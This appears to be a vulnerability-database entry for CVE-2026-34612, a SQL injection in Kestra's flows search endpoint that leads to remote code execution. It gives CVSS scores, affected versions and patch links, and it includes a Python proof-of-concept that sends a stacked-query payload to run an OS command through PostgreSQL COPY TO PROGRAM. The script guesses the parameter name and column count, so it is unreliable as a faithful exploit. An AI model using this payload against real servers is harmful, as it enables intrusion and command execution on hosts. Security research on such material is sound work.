Security Vulnerability Report
CVE-2026-34612 CVSS 9.9 CRITICAL

Published: 2026-04-03 23:17:05
Last Modified: 2026-04-13 17:36:59

Description

Kestra is an open-source, event-driven orchestration platform. Prior to version 1.3.7, Kestra (default docker-compose deployment) contains a SQL Injection vulnerability that leads to Remote Code Execution (RCE) in the following endpoint "GET /api/v1/main/flows/search". Once a user is authenticated, simply visiting a crafted link is enough to trigger the vulnerability. The injected payload is executed by PostgreSQL using COPY ... TO PROGRAM ..., which in turn runs arbitrary OS commands on the host. This issue has been patched in version 1.3.7.

CVSS Details

CVSS Score: 9.9
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:kestra:kestra:*:*:*:*:*:*:*:* - VULNERABLE
Kestra < 1.3.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-34612 PoC: Kestra SQL Injection to RCE
# Target: Kestra < 1.3.7
# Endpoint: GET /api/v1/main/flows/search
target_url = "http://vulnerable-host:8080/api/v1/main/flows/search"

# Replace with a valid authentication token (low privilege is enough)
auth_token = "Bearer YOUR_JWT_TOKEN_HERE"

# Payload to execute 'touch /tmp/pwned' using PostgreSQL COPY TO PROGRAM
# Note: This depends on the table structure, UNION injection is used here as an example
payload = "' UNION SELECT 1,2,3,4,5,6,7; COPY (SELECT '') TO PROGRAM 'touch /tmp/pwned'--"

headers = {
    "Authorization": auth_token
}
params = {
    "q": payload  # Assuming 'q' is the vulnerable parameter based on search endpoint context
}

try:
    print(f"Sending payload to {target_url}...")
    response = requests.get(target_url, headers=headers, params=params, timeout=10)
    if response.status_code == 200:
        print("Request sent successfully. Check if command executed on host.")
    else:
        print(f"Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

References

Patch commit: https://github.com/kestra-io/kestra/commit/3926762795df8ad3e03924b370c51832ed3a21d3
Release notes for v1.3.7: https://github.com/kestra-io/kestra/releases/tag/v1.3.7
Vendor advisory (tagged Exploit, Mitigation): https://github.com/kestra-io/kestra/security/advisories/GHSA-365w-2m69-mp9x

Additional NVD Record Data

Vulnerability status: Analyzed
Weakness: CWE-89 (SQL Injection)
Affected CPE: cpe:2.3:a:kestra:kestra:*:*:*:*:*:*:*:* with versionEndExcluding 1.3.7 (matchCriteriaId 0EAC1A4D-3CFB-44C4-9EC1-3D27B2781397)

The NVD record carries two CVSS 3.1 metrics. The secondary (CNA) metric is the 9.9 CRITICAL score shown above, vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (exploitability score 3.1, impact score 6.0). The NVD primary metric is 9.0 CRITICAL, vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H (exploitability score 2.3, impact score 6.0). The two vectors differ only in the User Interaction component (UI:N versus UI:R).